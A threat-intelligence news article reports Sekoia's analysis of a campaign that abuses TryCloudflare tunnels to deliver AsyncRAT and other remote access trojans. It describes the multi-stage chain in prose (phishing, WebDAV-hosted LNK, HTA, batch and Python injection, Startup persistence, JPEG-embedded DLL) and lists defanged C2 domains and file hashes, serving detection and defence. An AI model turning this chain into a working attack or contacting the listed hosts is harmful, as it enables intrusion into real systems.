Threat intelligence researchers at Sekoia’s Threat Detection & Research (TDR) team have uncovered a sophisticated adversary infrastructure that exploits Cloudflare’s tunnel service to deliver a variety of remote access trojans (RATs) to targeted systems.
The technique, operational since at least February 2024 and corroborated by multiple cybersecurity vendors including Forcepoint, Fortinet, Orange, and Proofpoint, demonstrates persistent abuse of the TryCloudflare tunneling solution for evading detection and facilitating malicious payload delivery.
Adversaries Leverage Cloudflare’s TryCloudflare for Stealthy RAT Deployment
The underlying campaigns employ elaborate, multi-step infection chains designed to bypass conventional security defenses and exploit users’ trust in seemingly legitimate communications.
Initial compromise is achieved via spear-phishing emails, frequently masquerading as business-related notifications such as invoices or purchase orders.
These emails often embed a crafted “application/windows-library+xml” file an outdated but still occasionally trusted file type which references a malicious remote WebDAV resource.
Upon user interaction, this library file triggers the retrieval of a malicious Windows shortcut (LNK) file, tailored to impersonate a legitimate document (e.g., a PDF).
Modern browsers attempt to mitigate automatic execution by appending a “.download” extension, yet attackers have shifted to leveraging LNK files accessed over the network to circumvent such safeguards.
Clicking the shortcut launches an embedded HTML Application (HTA), which executes further code via VBScript to run an obfuscated batch (BAT) script acquired from the attacker’s infrastructure.
Complex, Multi-Stage Infection Chains Target Windows Systems Across Organizations
According to the Report, this batch script serves as a critical junction in the attack chain.
It orchestrates the download and installation of Python and supporting scripts utilizing archive files like XZ via PowerShell commands, then executes these Python scripts to inject the next-stage payloads into benign processes such as “notepad.exe.”
Persistence is established by dropping obfuscated VBS and BAT files into the Windows Startup directory, a known technique for evading behavioral detection tools.
The final payload is typically a remote access trojan (such as AsyncRAT), loaded reflectively from a JPEG image containing a base64-encoded DLL.
This stage leverages PowerShell’s “System.Reflection.Assembly::Load” method, a known indicator of PowerShell-based reflective loading.
The RAT then connects to command-and-control (C2) endpoints residing behind Cloudflare tunnels and dynamic DNS services (e.g., dyndns.org, duckdns.org), further masking the attackers’ operational infrastructure and complicating attribution and network-based detection.
Throughout the infection lifecycle, the adversaries implement several layers of defense evasion, including the manipulation of file attributes (attrib.exe) to hide installation directories from users and security solutions.
They also perform post-exploitation cleanup to mitigate forensic discovery. Sekoia’s detection strategy relies heavily on correlation rules and Sigma-based detection content, continuously updated to catch suspicious file types, process chains, and network connections unique to these campaigns.
As attackers persist in leveraging trusted services like Cloudflare to facilitate malware deployment, defenders are urged to augment detection capabilities with timely threat intelligence and behavior-based monitoring.
Continuous vigilance and collaboration across the security community remain paramount to stay ahead of evolving threats that blend old and new techniques for stealthy persistence.
Indicators of Compromise (IOCs)
| Type | Value |
|---|---|
| C2 Domain | malawi-light-pill-bolt[.]trycloudflare[.]com |
| C2 Domain | players-time-corresponding-th[.]trycloudflare[.]com |
| C2 Domain | spaces-corner-notices-battery[.]trycloudflare[.]com |
| C2 Domain | xi-if-grows-valued[.]trycloudflare[.]com |
| C2 Domain | phvnmarch8787[.]duckdns[.]org |
| File Hash (SHA256) | 0d8d46ec44e737e6ef6cd7df8edf95d83807e84be825ef76089307b399a6bcbb (mslibrary attachment) |
| File Hash (SHA256) | c935cc41342794c23d640333a1ddd511f9c51e5b790261dc848ec5f7ac28650a (ben.bat) |
| File Hash (SHA256) | 47453b0ad93f60254ffb30a0964e0b8b6f1979e199d707b971c6ab6277fe0185 (jmb.hta) |
| File Hash (SHA256) | 5d932bfda0ffd31715700de2fd43fc89c0f1d89eeabac92081ebe2062da84152 (pws1.vbs) |
| File Hash (SHA256) | 0d7cee0c13374181a23e8f605b32f2969c9c490b83c7891318f26bd17777fd7c (PWS.vbs) |
| File Hash (SHA256) | e0e0f9a1082b641acff2cb225454342ca54109d01001b0e20b4fac0c9d5501a4 (RE_0059038327392.pdf.lnk) |
| File Hash (SHA256) | c458a21ae510f81fd76affb147ce84008c66b9dab246f6a2322e0f3b137e0539 (RE_070362683042.pdf.lnk) |
| File Hash (SHA256) | 33feae2e66e25f1b2d5905e0ce7b837bdeb6e8e9782ab39ff06b2243a7c4b5e7 (RE_1047389392.pdf.lnk) |
| File Hash (SHA256) | a0a446acd5540772ab9a3ae2f78f94f9a203cae06249d9e70710d7f797ff9da9 (startupppp.bat) |
| File Hash (SHA256) | 0ff5dd1787acc886a586282858112c6f73b48c31093080d2d8a6e66f018ce8c7 (ENCRYPTION01.jpg) |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
 team have uncovered a sophisticated adversary infrastructure.){kind=link}